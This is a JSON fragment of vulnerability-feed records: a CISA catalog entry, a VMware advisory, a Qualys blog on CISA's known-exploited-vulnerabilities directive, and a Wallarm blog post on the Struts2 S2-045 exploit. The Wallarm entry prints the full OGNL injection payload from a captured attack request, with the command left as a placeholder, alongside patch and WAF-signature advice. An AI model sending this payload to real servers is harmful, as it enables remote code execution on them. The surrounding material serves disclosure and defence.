"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-1547", "CVE-2012-0391", "CVE-2018-8453", "CVE-2021-35247"], "modified": "2022-01-25T00:00:00", "id": "CISA:84B5063678E22C88DCF150A265C078F7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/21/cisa-adds-four-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "wallarmlab": 
[{"lastseen": "2017-05-01T13:42:41", "description": "Two days ago Apache published a fix for the new [Remote Code Execution vulnerability in Struts2](<https://cwiki.apache.org/confluence/display/WW/S2-045>).\n\nStruts2 RCE attacks in the wild\n\nThis vulnerability allows an attacker to execute arbitrary Java code on the application server.\n\nWe can confirm that we caught the first exploit for this vulnerability in the wild. And this is crazy. Like previous OGNL exploits, this one is also based on OGNL macros to construct and call a shell command via a sequence of Java classes.\n\n#### Exploit\n\n[Wallarm](<http://wallarm.com>) first caught the exploit on Mar 8, 03:34 am. Please look at the sample malicious HTTP request below:\n \n \n GET /valid-struts.action HTTP/1.1 \n User-Agent: any \n Content-Type: %{(#_=\u2018multipart/form-data\u2019).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\u2018com.opensymphony.xwork2.ActionContext.container\u2019]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmds=(<some malicious code here>).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\n\n#### Mitigation\n\nPlease check that you\u2019ve already updated to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [Struts 2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>)\n\nIf you are unable to update Struts2 immediately, you should apply a virtual patch to your WAF. 
It\u2019s essentially similar to the previous OGNL exploits; however, it\u2019s likely not to be covered by many existing WAF signatures. If you are using an old-fashioned Web Application Firewall, make sure to add this string as a new signature:\n \n \n %{(#_=\u2019multipart/form-data\u2019)\n\n#### History\n\nHere is a list of all historical OGNL security issues in Struts2:\n\n * <https://www.cvedetails.com/cve/CVE-2016-3093/>\n * <https://www.cvedetails.com/cve/CVE-2016-0785/>\n * <https://www.cvedetails.com/cve/CVE-2013-2251/>\n * <https://www.cvedetails.com/cve/CVE-2013-2135/>\n * <https://www.cvedetails.com/cve/CVE-2013-2134/>\n * <https://www.cvedetails.com/cve/CVE-2013-2115/>\n * <https://www.cvedetails.com/cve/CVE-2013-1966/>\n * <https://www.cvedetails.com/cve/CVE-2013-1965/>\n * <https://www.cvedetails.com/cve/CVE-2012-4387/>\n * <https://www.cvedetails.com/cve/CVE-2012-0838/>\n * <https://www.cvedetails.com/cve/CVE-2012-0391/>\n * <https://www.cvedetails.com/cve/CVE-2010-1870/>\n * <https://www.cvedetails.com/cve/CVE-2008-6504/>\n\nThis means that the OGNL technology is broken altogether.\n\n* * *\n\n[New Struts2 Remote Code Execution exploit caught in the wild](<https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2>) was originally published in [Wallarm](<https://lab.wallarm.com>) on Medium.", "cvss3": {}, "published": "2017-03-09T00:15:54", "title": "New Struts2 Remote Code Execution exploit caught in the wild", "type": "wallarmlab", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2251", "CVE-2012-0391", "CVE-2008-6504", "CVE-2012-0838", "CVE-2016-0785", "CVE-2010-1870", "CVE-2013-1965", "CVE-2012-4387", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2016-3093"], "modified": "2017-03-10T16:52:09", "href": 
"https://lab.wallarm.com/new-struts2-remote-code-execution-exploit-caught-in-the-wild-34e52fa8e2?source=rss----49b51199b3da---4", "id": "WALLARMLAB:78B5A23A8C5AE14F8F16C0F0A2134851", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2022-06-19T20:02:41", "description": "a. vCenter and ESX update to JRE 1.6.0 Update 31\n\nThe Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012.\n\nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2012-08-30T00:00:00", "type": "vmware", "title": "VMware vSphere and vCOps updates to third party libraries", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2010-2761", "CVE-2010-4180", "CVE-2010-4252", "CVE-2010-4410", "CVE-2011-0014", "CVE-2011-1020", 
"CVE-2011-1089", "CVE-2011-1833", "CVE-2011-2484", "CVE-2011-2496", "CVE-2011-2699", "CVE-2011-3188", "CVE-2011-3209", "CVE-2011-3363", "CVE-2011-3597", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4110", "CVE-2011-4128", "CVE-2011-4132", "CVE-2011-4324", "CVE-2011-4325", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2011-5057", "CVE-2012-0050", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0207", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0394", "CVE-2012-0815", "CVE-2012-0841", "CVE-2012-0864", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583", "CVE-2012-2110"], "modified": "2012-12-20T00:00:00", "id": "VMSA-2012-0013.2", "href": "https://www.vmware.com/security/advisories/VMSA-2012-0013.2.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase and tags them with the RTI field \u201cCISA Exploited\u201d; this is an ongoing process, as CISA frequently adds the latest CVEs to the catalog as part of its regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. 
The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. 
With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": [], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}